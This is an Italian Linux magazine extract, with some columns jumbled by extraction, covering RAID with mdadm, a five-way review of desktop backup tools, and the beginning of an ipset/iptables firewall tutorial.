libero con $ mdadm /dev/md0 --add-spare /dev/sdc3. Se sdb
dovesse fallire ed essere rimosso come sopra, sdc3 sarà
aggiunto in automatico all’array al suo posto e sincronizzato.
è normalmente
amministrato
con mdadm
da riga
di comando,
ma c’è un modulo
RAID per
Webmin
se volete
un’opzione
grafica
Tutti questi esempi usano RAID 1 ma i processi, a parte
la creazione iniziale dell’array, sono identici per tutti i
livelli più alti di RAID.
Controllo degli errori
Se un disco sta fallendo, dovrete controllare sempre /proc/
mdstat? Naturalmente no, mdadm ha anche una modalità
per controllare i vostri array e viene lanciata come servizio
all’avvio. Tutto quello che dovrete fare è configurarla in /etc/
mdadm.conf, trovare la riga contenente MAILADDR,
impostarlo al vostro indirizzo email e rimuovere il # dall’inizio
della riga. Ora impostate il servizio mdadm perché venga
lanciato quando avviate il sistema e questo controllerà
i vostri array RAID notificandovi ogni problema.
La configurazione in /etc/mdadm.conf viene usata anche
per determinare quali dispositivi appartengono a quale array.
Il comportamento predefinito è di scansionare i vostri dischi
all’avvio per identificare i componenti dell’array ma potete
anche specificarli esplicitamente con una riga ARRAY.
Potete generare tale riga con $ mdadm --examine --scan.
Questo può essere utile se avete uno o più dispositivi lenti
collegati al vostro sistema che rallentano il processo
di scansione. Negli esempi precedenti avete costruito array
RAID da partizioni, ma potete crearli anche da interi dischi,
per esempio un array RAID 5 di tre dischi come questo:
$ mdadm --create /dev/md0 --level=raid5 --raid-devices=3 /
dev/sd{a,b,c}
Dopo aver creato un array come questo, potete usare gdisk
o gparted per partizionarlo come fareste con un disco fisico;
le partizioni appariranno come /dev/md0p1 e via dicendo.
Tenete a mente che il vostro BIOS richiederà che la directory
/boot stia in un filesystem a lui leggibile, quindi un RAID che
comprenda l’intero disco potrebbe non essere l’ideale per
il disco del sistema operativo. RAID funziona anche bene
con LVM (visto lo scorso mese). Create l’array RAID e usatelo
come volume fisico per LVM. In questo modo otterrete
la flessibilità di LVM con la sicurezza dei dati di RAID.

57
 Dischi e Dati

Strumenti perfetti
per i backup
Abbiamo messo sul nostro banco di prova cinque applicazioni per salvare
i propri dati. Solo una riuscirà a salire sul podio del primo classificato

Modalità del test

In questo confronto ci siamo
concentrati sugli strumenti per
il backup dedicati all’ambiente
desktop. Il salvataggio dei dati
è sempre stato un argomento molto
delicato. L’utente che si trova
a ripristinare un backup vive già
di per sé una situazione stressante,
non ha bisogno di complicarsi
ulteriormente la vita perdendosi
tra svariati menu e funzioni. Ecco
perché abbiamo puntato molto sulla
semplicità d’uso. Un altro aspetto
che deve essere valutato, è l’utilizzo
delle risorse durante le operazioni
di salvataggio. I programmi che si
occupano di questo aspetto non
devono saturare il processore,
impedendoci così di lavorare.
Non ci siamo fatti mancare
un’occhiata alle funzioni extra.
Non sono obbligatorie, ma possono
sempre essere utili. Infine, abbiamo
analizzato la documentazione.

L “La maggior parte degli strumenti

a migliore strategia per
evitare catastrofiche perdite
di dati consiste nell’eseguire
regolarmente la procedura
per il backup utilizza lo spazio
di backup. Progettare e organizzare
questa operazione è essenziale per
a disposizione in modo efficiente”
non correre rischi. Una volta chiaro vi aiutano a identificare le directory salvataggio completo. I software presi
cosa volete salvare, dovete decidere più importanti da mettere al sicuro. in considerazione permettono
La nostra quando. Per l’occasione, potete Inoltre non lasciano niente al caso di comprimere e criptare i file.
selezione scegliere tra una quantità e riducono al minimo la possibilità Risparmierete spazio senza lesinare
impressionante di programmi di errori. La maggior parte gestisce sulla sicurezza. Naturalmente, come
B
 ack In Time
specifici. Il loro scopo è farvi i backup incrementali che tutti gli strumenti di sistema, anche
Deja Dup
Gadmin-Rsync
risparmiare tempo, mettendo permettono di salvare solo i file quelli dedicati al backup devono
LuckyBackup a disposizione gli strumenti necessari modificati. In questo modo, oltre trovare il giusto equilibrio tra
Areca Backup per gestire nel dettaglio il salvataggio a ottimizzare il consumo di risorse, comodità e controllo. Vediamo quale
dei dati. Queste applicazioni, infatti, non dovrete eseguire di nuovo un tra quelli scelti è il migliore.

58

Controllo totale
Fategli capire chi comanda
I
n linea di principio, tutti gli
strumenti di backup sono simili
in termini di caratteristiche
e funzioni. Tuttavia ci sono delle
eccezioni. Una di queste è Déjà
Dup. Questa applicazione consente
di salvare intere cartelle ma non
i singoli file. Un altro aspetto
del software da rilevare è la sua
incapacità nel creare più set
di backup. In pratica, è in netto
contrasto con tutti gli altri
programmi che abbiamo preso
in considerazione. Areca, Back
In Time, Gadmin-Rsync
e LuckyBackup, infatti,
consentono di eseguire salvataggi
multipli di più file e cartelle,
creando poi diversi profili. Inoltre,
potete specificare i modelli per
l’inclusione e l’esclusione di singoli
file. Areca Backup può filtrare
i dati in base a estensione, data
e dimensione. Inoltre, permette
di escludere i file bloccati o speciali.
Allo stesso modo, anche in Back
In Time riuscite a specificare
Programmazione e interfaccia
L’esecuzione automatica e l’ambiente grafico hanno il loro peso
U
na volta configurato il backup,
questo dovrebbe funzionare
autonomamente in
background. Tutti i software, fatta
eccezione per Areca, dispongono di
una funzione per la programmazione
Gli script creati con Gadmin-Rsync possono essere gestiti manualmente.
Sono archiviati nella cartella /etc/gadmin-rsync/script
i documenti che non volete
includere nel backup.
L’applicazione contiene un elenco
di modelli comuni per i dati che
devono essere esclusi. In più,
è possibile specificare
manualmente i preset per file
e cartelle, come la dimensione
massima che devono avere per
essere inseriti nel salvataggio.
LuckyBackup conta su un certo
numero di opzioni che consentono
di prendere il controllo dell’intera
procedura. Chi ha più esperienza,
può creare la propria lista di
esclusione. Gadmin-Rsync, allo
stesso modo, offre una buona serie
di funzioni a cui mettere mano.
Purtroppo, però, non è al pari degli
altri software. Infatti, il processo
di inclusione ed esclusione deve
essere compiuto manualmente.
Inoltre non c’è alcun modello
predefinito che definisca fin da
subito il tipo di backup che si vuole
eseguire. Tutte le applicazioni prese
in considerazione hanno comunque
dei salvataggi. Areca, infatti, si basa
sul task Cron accessibile dalla riga di
comando. C’è una procedura guidata
che consente di generare uno script
di backup che può poi essere
programmato con Cron. Per esempio,
Copie di sicurezza
Se si verifica un problema durante un task, LuckyBackup
vi spiega il motivo nella sezione Informazioni
uno strumento per il salvataggio
su base remota. Areca Backup Verdetto
utilizza FTP o SFTP, mentre Back
In Time riesce a sfruttare Areca Backup
il protocollo SSH. Gadmin-Rsync HHHHH
Back In Time
consente la configurazione locale HHHHH
per i backup remoti (o viceversa), Déjà Dup
sfruttando comunque una HHHHH
trasmissione criptata. Da questo Gadmin-Rsync
punto di vista, il migliore è però
HHHHH
LuckyBackup
decisamente Déjà Dup. Il software, HHHHH
oltre ai tradizionali FTP e SSH, Déjà Dup non
riesce a dialogare anche con riesce a reggere
Samba, sfruttando perfino il confronto con
i contendenti.
le condivisioni WebDAV.
si può chiedere ad Areca di eseguire
il salvataggio di una directory una
volta al giorno o alla settimana. Tutti
i backup vengono mantenuti per sei
settimane, mentre gli archivi mensili
per un anno. Un altro strumento che
fa uso di Cron è Gadmin-Rsync. Verdetto
Non c’è alcun controllo grafico per
impostare lo scheduler. Tuttavia Areca Backup
è possibile pianificare le attività HHHHH
Back In Time
di backup in fase di spegnimento
HHHHH
del sistema. LuckyBackup permette Déjà Dup
di usare sia Cron sia la propria GUI. HHHHH
L’approccio è quindi più semplice Gadmin-Rsync
anche per i principianti. Back In Time HHHHH
LuckyBackup
offre fin da subito la propria HHHHH
pianificazione predefinita che può Déjà Dup
essere modificata a piacere. e Gadmin-
Niente vieta di gestire i salvataggi Rsync offrono
il massimo
anche durante l’avvio e lo
controllo.
spegnimento del sistema.
59
 Dischi e Dati

Esperienza d’uso
Quanto riescono a semplificare la vita?

C
ome tutti gli strumenti di sistema, c’è
una linea sottile che divide funzionalità
da usabilità. L’eccessiva presenza
di strumenti può non essere un vantaggio.
Spesso, invece, si rivela proprio il contrario.
Come anticipato all’inizio di questo confronto,
i programmi per il backup devono essere
semplici e veloci da usare. Avere un’interfaccia
grafica troppo ricca significa perdere tempo.
La maggior parte dei software presi in
considerazione si basa su riga di comando.
In questo caso, è importante che le applicazioni
siano utilizzabili anche dagli utenti inesperti.
La creazione di un backup, inoltre, è un
processo che richiede una serie di passaggi.
Abbiamo quindi puntato l’attenzione sui
programmi che forniscono una procedura
passo a passo di facile comprensione.

Areca Backup  HHHHH

L’interfaccia di Areca brilla per organizzazione. La disposizione degli
strumenti segue una logica ben precisa. Prima di tutto occorre impostare
la destinazione del backup tramite il secondo menu. Si apre quindi una
finestra a più schede che permette di regolare il salvataggio in ogni
dettaglio. Inizialmente dovrete stabilire se creare un backup convenzionale,
una copia dei soli dati modificati, oppure un singolo file di grandi dimensioni
contenente tutto l’archivio. Quest’ultimo viene aggiornato a ogni backup.
Areca consente di comprimere i salvataggi, offrendo così un risparmio
di spazio. Nello specificare quali documenti salvare, si può indicare
l’inclusione o meno delle sottocartelle, oppure l’uso dei link simbolici.
Potete poi lanciare un backup incrementale, differenziale o completo.

Back In Time  HHHHH

Questo strumento ha due interfacce grafiche a seconda del desktop
che utilizzate: Gnome o KDE. Inoltre, è disponibile nei repo di tutte le
distribuzioni più diffuse. Back in Time può essere installato sia da root
che non. Nel primo caso, esegue il salvataggio dei file di sistema.
Nel secondo, invece, solo di quelli personali. Al primo avvio viene chiesto
di definire un backup interno al proprio profilo predefinito. Dalla finestra
dedicata è poi possibile gestire più profili con diverse impostazioni.
La maggior parte delle configurazioni può essere lasciata inalterata.
Niente però vieta di mettere mano alla voce che consente di rimuovere
i salvataggi più vecchi di una certa data.

Documentazione e supporto
Quando avete bisogno di aiuto a chi vi rivolgete? Verdetto

L
a procedura di backup
è considerata un’attività
amministrativa del sistema.
Questo significa che prima
di metterla in pratica è necessario
avere ben chiaro cosa state facendo.
Purtroppo, sotto questo aspetto,
parecchi strumenti lasciano
a desiderare, non fornendo
un’adeguata documentazione sul
loro funzionamento. Back in Time,
per esempio, riduce al minimo
le informazioni utili. Trovate solo
una breve introduzione, seguita di funzionamento nella wiki di Areca Backup
da una guida illustrata e una wiki Gnome. Ci sono poi altre risorse HHHHH
su GitHub. Allo stesso modo, sotto forma di FAQ in Ubuntu. Back In Time
HHHHH
Gadmin-Rsync offre un semplice L’aspetto positivo è che in realtà
Déjà Dup
tutorial per il backup e il ripristino non richiede alcuna conoscenza HHHHH
dei file. A peggiorare le cose, c’è il specifica. Potete usarlo senza grossi Gadmin-Rsync
sito Web ufficiale che non fornisce pensieri. LuckyBackup e Areca sono HHHHH
alcuna informazione aggiuntiva. invece molto dettagliati. LuckyBackup
HHHHH
Per fortuna, ci sono molti utenti Entrambi hanno manuali ricchi Solo Areca
appassionati di questo strumento di informazioni. I siti ospitano una e Lucky hanno
che hanno creato diverse risorse serie di video dimostrativi e, se vari manuali
non ufficiali. Déjà Dup mette avete domande, ci sono i forum e risorse
dettagliate.
a disposizione solo alcuni dettagli di supporto su KDE e SourceForge.

60
 Copie di sicurezza
Déjà Dup  HHHHH
Déjà Dup è uno degli strumenti più semplici da utilizzare. Il suo
punto di forza, infatti, è proprio l’interfaccia che non vi inonda
di funzioni, schede e via dicendo. Al primo avvio, troverete una
pagina che illustra le principali opzioni dell’applicazione. Qui sono
riportati gli eventuali backup già eseguiti o quelli in programma.
Si capisce fin da subito come Déjà Dup cerchi di mettervi fin
da subito a vostro agio. Riporta le voci necessarie, senza perdersi
in inutili esercizi di stile. Tutto quello di cui avete bisogno è ben
disposto. Perdersi è praticamente impossibile. Una delle migliori
caratteristiche di questo software consiste nel ripristino di singoli
file. Basta fare click sulla cartella di backup, quindi scegliere
l’opzione Ripristina file mancante.

Gadmin-Rsync  HHHHH
Gadmin-Rsync è un front-end per rsync. Ha un’interfaccia troppo
affollata di strumenti, pulsanti, schede, caselle di testo e selettori
per la scelta multipla. Al primo impatto, infatti, lascia piuttosto
disorientati. Quando lo avviate, viene chiesto di creare un nuovo
backup tramite la procedura guidata. A tal proposito, scegliete
se operare un salvataggio in locale o in remoto. Una volta fatto,
potrete eseguire e pianificare le successive procedure. Gadmin-
Rsync consente di definire più set di salvataggi, regolandone
le attività su un calendario predefinito.

LuckyBackup  HHHHH
LuckyBackup è un altro front-end per rsync. L’interfaccia non è delle
più piacevoli, ma contrariamente a quello che si può pensare,
è piuttosto semplice da usare. Quando si avvia il programma per
la prima volta, dovrete impostare un’attività di backup per il profilo
predefinito. Purtroppo è possibile aggiungere un solo percorso
di salvataggio per ogni task. Se avete bisogno di mettere al sicuro
più directory, dovrete creare un’attività diversa per la singola sorgente.
Questa limitazione potrebbe sembrare negativa. Tuttavia offre
un’eccellente livello di flessibilità. Infatti, pianificate gli interventi
in tempi e intervalli diversi. Anche il ripristino è piuttosto semplice.
Lucky visualizza un elenco navigabile di tutte le istantanee registrate.
Basta solo scegliere quella da recuperare.

Compressione e crittografia
Risparmiare spazio e tenere al sicuro i dati Verdetto

A
seconda dei dati che state
salvando, probabilmente
vorrete evitarne l’accesso
a persone non autorizzate. Alcuni,
inoltre, potrebbero avere necessità
di comprimere i backup per
risparmiare spazio. Se una di
queste due caratteristiche fanno
al caso vostro, allora è meglio
evitare LuckyBackup e Back In
Time. Entrambi non dispongono
di alcuna funzione per la
crittografia e la compressione.
Gadmin-Rsync, invece, consente di configurare lo strumento per Areca Backup
di creare perfino salvataggi criptati funzionare con bzip2. Il livello, HHHHH
in remoto. La procedura avviene inoltre, può essere regolato da Back In Time
HHHHH
sfruttando una combinazione un minimo di zero a un massimo Déjà Dup
di ssh-keygen/SCP e SSH. Déjà di nove. Per impostazione HHHHH
Dup offre sia la crittografia sia predefinita, il parametro si attesta Gadmin-Rsync
la compressione. Basa il suo su sei come base media. Areca HHHHH
LuckyBackup
funzionamento sullo strumento è forse il programma che più si
HHHHH
Duplicity per la blindatura dei dati, contraddistingue per flessibilità. Areca Backup
cui poi viene aggiunto il blocco Permette di usare gli algoritmi AES e Déjà Dup
tramite password di GPG. 128 e AES 256, nonché ZIP e ZIP64. forniscono
La compressione, invece, viene È quindi facile intuire come sia le migliori
funzioni.
gestita da GZIP, ma niente vieta il migliore in questo comparto.

61
 Dischi e Dati
Parametri configurabili
Potete adattarli alle vostre necessità?
T
utti i programmi presi in
considerazione permettono
il backup e il ripristino dei file.
Sono progettati proprio per questo
e, con le dovute differenze che
analizziamo in questo articolo, fanno tutti
piuttosto bene il proprio lavoro. Alcuni
di essi, però, si differenziano dalla massa
per la presenza di strumenti extra.
Se avete un sistema abbastanza potente, potete chiedere a Back In Time
di usare il checksum dei file per definire le modifiche
Versioning e ripristino
Quando perdete i vostri dati, ecco come recuperarli
U
no strumento di backup che
si rispetti dovrebbe consentirvi
di recuperare i dati in modo
semplice e veloce. A eccezione
di LuckyBackup, tutte le applicazioni
prese in esame eccellono in questo
compito. Lucky, invece, non brilla per
flessibilità. Per chiarire cosa succede,
è importante spiegare il funzionamento
del software. Per impostazione
predefinita, i file contenuti nella cartella
sorgente vengono salvati in quella
di destinazione. Se si elimina
accidentalmente un documento nella
posizione originale e si esegue di nuovo
il backup, il file viene cancellato anche
dalla directory di destinazione.
Per evitare questo inconveniente,
62
Seppure non siano necessariamente
indispensabili, offrono comunque
qualcosa in più che vale la pena di tenere
in considerazione. Areca, Gadmin-Rsync
e LuckyBackup consentono di simulare
il processo di salvataggio, così da
rivedere le eventuali modifiche ai file nella
posizione di memorizzazione. Areca,
nello specifico, tratta le proprie attività
si può fare in modo che Lucky
mantenga più versioni di backup.
Così facendo, però, quando si tenta
il ripristino potreste confondervi su
quale release recuperare. Areca può
ripristinare i salvataggi sotto forma
di archivio completo o singoli file.
Il processo offre diverse opzioni.
Potete evitare di importare i documenti
già presenti, oppure non prendere
in considerazione i backup più vecchi.
Back In Time crea istantanee delle
singole directory. Avrete a disposizione
l’intero contenuto di una cartella.
Si possono ripristinare i singoli
documenti, così come il salvataggio
completo. Déjà Dup genera backup
incrementali e per impostazione
come processi che possono essere
riavviati in qualsiasi momento. Dispone
poi di una cronologia estremamente
dettagliata che registra tutte le azioni che
svolgete. Infine, potete chiedere ad Areca
di fornirvi un resoconto del backup
tramite email. Back In Time disabilita in
automatico la creazione delle istantanee
di sistema nel caso il PC sia alimentato
a batteria. Per impostazione predefinita,
il programma verifica le eventuali
modifiche apportate ai file. Se non rileva
niente, salta la procedura di salvataggio
benché sia impostata nello storico delle
operazioni automatizzate. LuckyBackup
Verdetto
esegue un backup completo, copiando Areca Backup
il contenuto della directory sorgente HHHHH
in quella di destinazione. In aggiunta, Back In Time
dispone di un’opzione per la HHHHH
Déjà Dup
sincronizzazione. Assicura così che i dati HHHHH
contenuti nelle cartelle prese in esame Gadmin-Rsync
siano sempre aggiornati. Una funzione HHHHH
simile viene messa a disposizione da LuckyBackup
Gadmin-Rsync. Il software può perfino
HHHHH
LuckyBackup,
eliminare i file di destinazione che non insieme ad
vengono rilevati nella directory sorgente. Areca, fornisce
Déjà Dup non offre granché in fatto di un’ottima
extra, se non la possibilità di determinare selezione di
opzioni extra.
il periodo di conservazione dei backup.
Verdetto
Areca Backup
HHHHH
Back In Time
HHHHH
Déjà Dup
Déjà Dup elimina i backup meno HHHHH
recenti se si rende conto che lo spazio Gadmin-Rsync
di archiviazione nel percorso scelto HHHHH
inizia a scarseggiare LuckyBackup
HHHHH
Déjà Dup
predefinita mantiene i più vecchi. è strettamente
Durante il ripristino, mette integrato
a disposizione una procedura guidata in Ubuntu
di semplice comprensione. Gardmin- e permette
di ripristinare
Rsync, infine, si comporta più o meno file e cartelle.
nello stesso modo.
 Copie di sicurezza

Strumenti di backup

Il verdetto
C
i auguriamo di avervi convinto
a utilizzare uno strumento
di backup. Indipendentemente
da quale sia la vostra scelta,
non si può prescindere dall’avere
un programma che metta in salvo
i documenti più importanti. Come
abbiamo visto in questo confronto,
un buon software riunisce una serie
di potenti utility con la capacità di
creare salvataggi in modo semplice
e veloce. Allo stesso tempo, deve
essere in grado di ripristinare il tutto
con la medesima facilità. Da questo
punto di vista, scegliere il vincitore
non è semplice. Se avete bisogno
di crittografare i dati, allora dovrete
scartare a priori LuckyBackup e Back
In Time. Quest’ultimo, non brillando
per la propria interfaccia grafica, crea
anche un serio ostacolo ai principianti
che vogliono utilizzarlo. Gadmin-Rsync
1° Areca Backup  HHHHH
Web: www.areca-backup.org Licenza: GNU GPL v2 Versione: 7.5
Lo strumento di backup a prova di futuro.
si comporta un po’ meglio, grazie
soprattutto alla possibilità di criptare
i propri backup remoti. Tuttavia, anche
in questo caso ci troviamo di fronte
a una GUI poco curata e ricca
di strumenti che finiscono per
disorientare. Déjà Dup è uno degli Areca Backup può essere usato senza installazione,
strumenti più intuitivi ma non ma dovete assicurarvi di avere Java
permette la creazione di raccolte
di backup. Se non ne avete bisogno, da utilizzare. Accoglie i principianti
si tratta di una soluzione alla portata senza spaventarli con innumerevoli
di tutti ed estremamente funzionale. funzioni e svolge molto bene il proprio
In Ubuntu è inclusa per impostazione lavoro. La capacità di eseguire
predefinita. Detto questo, abbiamo salvataggi e ripristinarli senza sforzo
deciso di assegnare il primo premio è davvero impressionante e merita
ad Areca Backup. Se non siete tutto il nostro plauso.
contrari alle
applicazioni Java,
vi innamorerete
“La capacità di salvataggio
di questo software.
È funzionale
e ripristino di Areca
e pratico è veramente impressionante!”
4° Back In Time  HHHHH
Web: http://backintime.le-web.org Licenza: GNU GPL v2 Versione: 1.1.12
Un ottimo strumento per mantenere più versioni di backup di file e cartelle.

2° Déjà Dup  HHHHH 5° LuckyBackup  HHHHH

Web: http://bit.ly/DejaDup Licenza: GNU GPL v3 Versione: 34.1 Web: http://bit.ly/LuckyBackup Licenza: GNU GPL v2 Versione: 0.4.8
Va bene per tutti. È facile da usare e svolge bene il proprio lavoro. È in modalità di manutenzione. Non offre niente di più rispetto agli altri.

3° Gadmin-Rsync  HHHHH A voi la parola...

Web: http://bit.ly/Gadmin-Rsync Licenza: GNU GPL v2 Versione: 0.1.9 Non siete d’accordo con le nostre scelte? Avreste usato altri software?
Un semplice front-end per la potente utility di backup rsync. Inviate le vostre opinioni su questo confronto a: recensioni@linuxpro.it

Considerate anche...
La maggior parte delle distro desktop viene
fornita di un proprio strumento di backup.
Linux Mint, per esempio, utilizza
MintBackup che vanta un’interfaccia
grafica semplice e intuitiva. È addirittura
possibile utilizzarlo in altre distribuzioni
come Ubuntu. Basta solo aggiungere
il relativo PPA. Allo stesso modo, Mageia fa
uso di Dark Snapshot, a cui è possibile
accedere dal Centro di Controllo. Permette
di salvare singoli file o eseguire intere
istantanee del sistema. Tra gli strumenti
di backup una volta molto popolari e adesso
in disuso ci sono FwBackup, Backerupper
e Simple Backup Solution. Se poi non
siete contrari alle applicazioni che si
gestiscono da riga di comando, potete dare
un’occhiata a Bonam. Può essere utilizzato
con rsync e duplicity che insieme forniscono
una piattaforma ricca di strumenti. Infine,
vi consigliamo di valutare anche i programmi
che eseguono snapshot di interi sistemi
anziché di singoli file o cartelle. Tra questi
ci sono TimeShift e Systemback.

63
 ipset Tutorial
Sicurezza di rete

Semplificate
i vostri firewall
Ecco come facilitarvi la vita nella manutenzione del firewall usando ipset
per rendere le configurazioni più immediate da leggere e modificare
stanno diventando sempre più complesse e le persone
vi fanno affidamento sempre di più: i firewall rimangono
ancora la prima linea di difesa, e questo implica che le
policy dei firewall stanno diventando più complesse.
Talvolta gli amministratori di sistema possono ricevere
richieste del genere “permetti HTTP all’host 192.0.2.1”, ma
più spesso le richieste sono più generali, come “permetti
SSH da tutte le workstation di sviluppo” o “permetti HTTP
e HTTPS da tutti i computer dell’ufficio” o ancora
“permetti SMTP, IMAP e qualcos’altro da questi siti
remoti”. Potreste anche dover permettere o rifiutare servizi
che sfruttano più di un protocollo e una porta, come IPsec,
che sfrutta alcuni protocolli IP per i dati e UDP per lo
scambio chiavi; oppure SIP, che può usare TCP o UDP per il
signalling e necessita anche di un range di porte UDP per
i media; o ancora Active Directory, che necessita di quasi
una dozzina di porte TCP e UDP. Naturalmente potete fare
tutto questo con il solo iptables. L’ovvio problema è che
richieste complesse richiedono spesso più di una regola
per essere soddisfatte. Talvolta potete gestire la
complessità dei protocolli controllando lo stato RELATED
e utilizzando i moduli conntrack; talvolta potete gestire
indirizzi e porte molteplici scrivendo script o utilizzandone
di già pronti come quelli nello strumento di configurazione
Shorewall. Gli script che generano regole di iptables

I
pset è un’estensione di Netfilter che vi permette di tuttavia non rimuovono la complessità, semplicemente
creare liste di indirizzi, reti e numeri di porte TCP/UDP la spostano, quindi l’output di iptables -L resta lo stesso
IPv4 e IPv6 da utilizzare in regole sorgente e della scrittura delle regole a mano (o talvolta addirittura
destinazione per iptables/ip6tables. In configurazioni maggiore). Se state cominciando a considerare un
complesse di firewall può semplificare di molto problema questo tipo di complessità, ipsec è una
la leggibilità e la possibilità di modificarle. buona soluzione.
Se il vostro firewall contiene molte regole simili
Tip con piccole varianti negli indirizzi sorgente/ Il flusso di lavoro
destinazione o nelle porte, ipset fa per voi. In generale un workflow ipset funziona così:
Usate l’opzione
Ipset è composto da due parti: un create un set (lista), aggiungete alcuni
family inet con
liste che includono modulo kernel e uno strumento di elementi e create una regola iptables/
indirizzi IPv4. Per amministrazione. La parte kernel ip6tables che vi faccia riferimento. Fino
liste che includono è stata integrata nel kernel standard a qui tutto semplice. Le liste possono
indirizzi IPv6 e lo strumento è solitamente essere di diversi tipi, quindi non potete
utilizzate family
disponibile negli archivi. Alcune aggiungere elementi a una lista finché
inet6. Se non
specificate una distribuzioni includono anche dei non la create e ne specificate il tipo al
famiglia verrà wrapper di servizio per caricare momento della creazione. Non potete far
presupposta essere configurazioni di ipset al boot, come riferimento a una lista in una regola iptables
IPv4.
ipset-service in Fedora. Le reti di computer fintantoché non create tale lista.

64
Tutorial ipset
La cosa bella è che potete modificare una lista
referenziata in una regola iptables al volo senza dover
ricaricare tutte le regole iptables. Supponete, quindi, di
avere le seguenti richieste:
Accettare SMTP, IMAP e POP3 da reti fidate 192.0.2.0/24
e 2001:db8::/64
Accettare SSH dagli host 192.0.2.10, 192.0.2.15,
2001:db8::100, 2001:db8::105
Aprire la porta 5000 dall’host 203.0.113.5, la porta
5010 dall’host 203.0.113.10 e la porta 5020 da
203.0.113.42
Ora vedrete come potete ridurre il numero delle regole e
rendere questa configurazione più gestibile. Per prima cosa
gestirete la parte email. Come potete vedere avete più porte
che indirizzi di rete, quindi andrete a creare una lista di porte
e le referenzierete nelle regole per tali sottoreti, così:
# ipset create EmailPorts bitmap:port range
0-65535 comment
# ipset add EmailPorts 25 comment SMTP
# ipset add EmailPorts 110 comment POP3
# ipset add EmailPorts 143 comment IMAP
Nel comando create, EmailPorts è il nome della lista.
Il tipo è rappresentato da bitmap:port che è quello che vi
serve per memorizzare le porte. L’opzione per port range
è obbligatoria, ma potete limitare ulteriormente il range se
volete. L’estensione ipset per memorizzare i commenti
assieme agli elementi è facoltativa, quindi dovrete abilitarla
esplicitamente con l’opzione comment. Ora dovete
assicurare che tutto sia corretto visualizzando il set
appena creato con il comando seguente:
ipset list EmailPorts
Potete anche visualizzare tutte le liste configurate con
ipset list senza argomenti. Ora che avete una lista di porte
potete referenziarla nelle regole di Netfilter:
# iptables -A INPUT -s 192.0.2.0/24 -p tcp -m set --match-
set EmailPorts dst -j ACCEPT
# ip6tables -A INPUT -s 2001:db8::/64 -p tcp -m set
--match-set EmailPorts dst -j ACCEPT
Come usare ipset
Notate che non potete specificare un protocollo assieme
alla porta in questo tipo di lista; quello che dovete fare è
specificare il protocollo nella vostra regola di firewall.
Questo funziona sia con TCP che con UDP (o anche SCTP).
L’opzione -m set --match-set è dove fate riferimento
all’oggetto ipset. è composta da due parti: la lista e la
direzione. Il requisito lista è piuttosto ovvio: è il nome della
vostra lista. La direzione dev’essere src (sorgente) o dst
(destinazione, più avanti vedrete che può esserci più di una
direzione). In questo caso siete interessati alle porte di
destinazione, quindi specificherete dst. Le liste di porte
possono essere usate sia in regole iptables che in regole
ip6tables: non c’è bisogno di modificare alcunché per i due
protocolli. Se dovete aggiungere un intero range di porte
a una lista, c’è una scorciatoia:
# ipset add PortList 15000-16000
Il rovescio della medaglia è esattamente questo: è una
scorciatoia, e ipset aggiungerà tutte le porte del range alla
lista, cosa che può avere un serio impatto sulla leggibilità,
quindi per grossi range può essere meglio specificarli
direttamente nelle regole iptables/ip6tables.
Una lista di host
Ora passate alla richiesta SSH. In questo caso avete
molteplici host e una sola porta, quindi è ragionevole
È buona norma indicare un nome memorizzabile alle vostre porte, così da
riconoscere quali vengono utilizzate anche un mese dopo averle configurate

IPv6 vs IPv4
In termini di forwarding,
filtering e policing, IPv6 non
è così diverso da IPv4.
Le differenze più evidenti
sono che il comando iptables
si chiama ip6tables, ma tutte
le opzioni, tranne alcune
specifiche del protocollo,
sono le stesse. Le opzioni di
ipset non fanno eccezione:
potete usare lo stesso
formato sia con iptables che
con ip6tables senza bisogno
di ricordare parametri
particolari. Altre opzioni
hanno controparti chiamate
diversamente in IPv6:
il campo time to live
è chiamato TTL (-m ttl --ttl-
[eq|lt|gt]) in IPv4 e HL (che
sta per ‘hop limit’, limite di
salti) in IPv6. L’equivalente
IPv6 è -m hl --hl-[eq|lt|gt].
Un altro esempio è il
protocollo ICMP, leggermente
diverso in IPv6. L’opzione per i
messaggi ICMP è -m icmpv6
--icmpv6-type=<type>.
Naturalmente ci sono certe
opzioni che non hanno una
controparte IPv4. Queste
includono il Mobility Header
usato nel mobile IPv6,
Destination Options,
l’header Hop-by-Hop
Options e alcune altre. Queste
non sono tuttavia così comuni
come l’indirizzo di sorgente
e destinazione. Nessuna delle
vostre conoscenze di iptables
andrà sprecata nella Visto che Internet si sta spostando gradualmente su IPv6, è ora di conoscere
transizione a IPv6. qualcosa sul protocollo: fortunatamente molte opzioni sono simili a IPv4

65

Sicurezza di rete
creare una lista di host e referenziarla in una regola per
SSH. In ipset non potete mescolare indirizzi IPv4 e IPv6 in
una sola lista, esattamente come usate iptables e ip6tables
per protocolli diversi. Dovete quindi creare due liste:
# ipset create TrustedHosts hash:ip family inet comment
# ipset add TrustedHosts 192.0.2.10 comment “Computer
di Alice”
# ipset add TrustedHosts 192.0.2.15 comment “Computer
di Matteo”
Qui il tipo hash:ip permette di registrare indirizzi IPv4
o IPv6 e family inet è la famiglia di indirizzi IP definita. Se la
famiglia di indirizzi non viene specificata viene predefinita
IPv4, quindi in questo caso l’opzione è ridondante. Nota:
è obbligatorio invece per IPv6.
# ipset create TrustedHosts6 hash:ip family
inet6 comment
# ipset add TrustedHosts6 2001:db8::100 comment
“Computer di Alice IPv6”
# ipset add TrustedHosts6 2001:db8::105 comment
“Computer di Matteo IPv6”
L’unica cosa che rimane da fare è impostare le regole di
Netfilter:
# iptables -A INPUT -p tcp --dport 22 -m set --match-set
TrustedHosts src -j ACCEPT
# ip6tables -A INPUT -p tcp --dport 22 -m set --match-set
TrustedHosts6 src -j ACCEPT
È possibile utilizzare le opzioni --match-set in una sola
regola. Se aveste voluto permettere le email da questi host,
avreste potuto riutilizzare la lista EmailPorts già impostata
e fare qualcosa di simile a questo:
# iptables -A INPUT -p tcp -m set --match-set EmailPorts
dst -m set --match-set TrustedHosts src -j ACCEPT
C’è anche un tipo per liste di network, hash:net, che
memorizza indirizzi subnet:
# ipset create NetworkList hash:net
# ipset add NetworkList 10.1.0.0/24
IP e porte
Ora vedrete un esempio più complesso: una lista di coppie
invece che una lista di oggetti individuali. In questo caso è
una lista di coppie indirizzo IP e porta che richiede
66
ipset Tutorial
molteplici porte e indirizzi. Può sembrare un po’ artificioso,
ma possono capitare situazioni in cui indirizzi e porte
apparentemente casuali siano invece relazionabili gli uni le
altre: un esempio è quello di dover permettere l’accesso
a un’applicazione in esecuzione su macchine dietro a NAT
per un supporto tecnico da una ditta che si connette da
diversi punti. Ipset supporta coppie (e anche triple) di
indirizzi e porte o reti e porte. Il tipo per coppie di indirizzi
